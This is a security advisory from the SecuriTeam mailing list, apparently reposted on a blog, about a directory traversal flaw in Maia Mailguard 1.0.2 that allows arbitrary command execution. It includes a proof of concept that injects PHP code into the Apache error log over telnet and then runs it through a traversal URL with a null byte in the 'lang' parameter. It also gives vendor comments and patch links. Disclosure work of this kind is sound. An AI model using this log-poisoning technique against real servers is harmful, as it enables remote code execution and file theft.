- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Maia Mailguard Arbitrary Code Execution
------------------------------------------------------------------------
SUMMARY
<http://www.miamailguard.com> Maia Mailguard is a web-based interface and
management system based on the popular amavisd-new e-mail scanner and
SpamAssassin. Written in Perl and PHP, Maia Mailguard gives end-users
control over how their mail is processed by virus scanners and spam
filters, while giving mail administrators the power to configure site-wide
defaults and limits." A directory traversal vulnerability exists in the
Maia Mailguard Web Application that enables an attacker to execute
arbitrary commands on the affected system.
DETAILS
Vulnerable Systems:
* Maia Mailguard version 1.0.2 and prior (FreeBSD)
Improper input validation on the "lang" variable in Maia Mailguard web
application has resulted in a Directory Traversal vulnerability that can
be used to execute arbitrary commands on he affected system, or, to read
arbitrary files on the affected system.
Proof of Concept:
1) An attacker can inject code into the httpd-error.log file by connecting
to port 80 on the affected system and issuing a "get <CODE HERE>" command.
See example below:
the-wretched:~ simon$ telnet maiatest.snosoft.com 80
Trying 10.0.0.128...
Connected to maiatest.snosoft.com.
Escape character is '^]'.
get <pre>><?php system('ls -laf /var/log');?>
HTTP/1.1 400 Bad Request
Date: Wed, 20 Jun 2007 21:31:58 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/2.8.28
OpenSSL/0.9.7e-p1
Connection: close
Content-Type: text/html; charset=iso-8859-1
2) Once the attacker has injected his code into the log file, the code can
be executed by forcing the web application to read the log file. When the
log file is read, the code is executed. Below is an example of code
execution:
the-wretched:~ simon$ wget
http://maiatest.snosoft.com/maia/login.php?lang=
./../../../../../../../../../../../../var/log/httpd-error.log%00.txt
Vendor Status:
Vendor has been notified and was quick to resolve the issue.
Vendor Comments:
"The only addition that I had was that it seems to only affect systems
like freebsd... It would be nice to nail that down. It suspect the root
security issue is really with the php and file-system interaction... my
patch just simply works around and blocks the root problem. From my
developer point of view, I'm asking for one file and the file-system is
giving us something else. That's a serious risk. If we could at least
express that concern, I think that would be prudent.
Chicken and egg problem, I was kinda waiting on you to post our own
ticket, but.... I can add a comment afterwards. OK. Here's our ticket
which also references the changeset:
<http://www.maiamailguard.org/maia/ticket/479>
http://www.maiamailguard.org/maia/ticket/479
A unified patch may be retrieved from:
<http://www.maiamailguard.org/maia/changeset/1184?format=diff&new=1184>
http://www.maiamailguard.org/maia/changeset/1184?format=diff&new=1184
David Morton"
ADDITIONAL INFORMATION
The information has been provided by <mailto:advisories@netragard.com>
Netragard Security Advisories.
The original article can be found at:
<http://www.netragard.com/pdfs/research/NETRAGARD-20070628-MAILGUARD.txt>
http://www.netragard.com/pdfs/research/NETRAGARD-20070628-MAILGUARD.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
No comments:
Post a Comment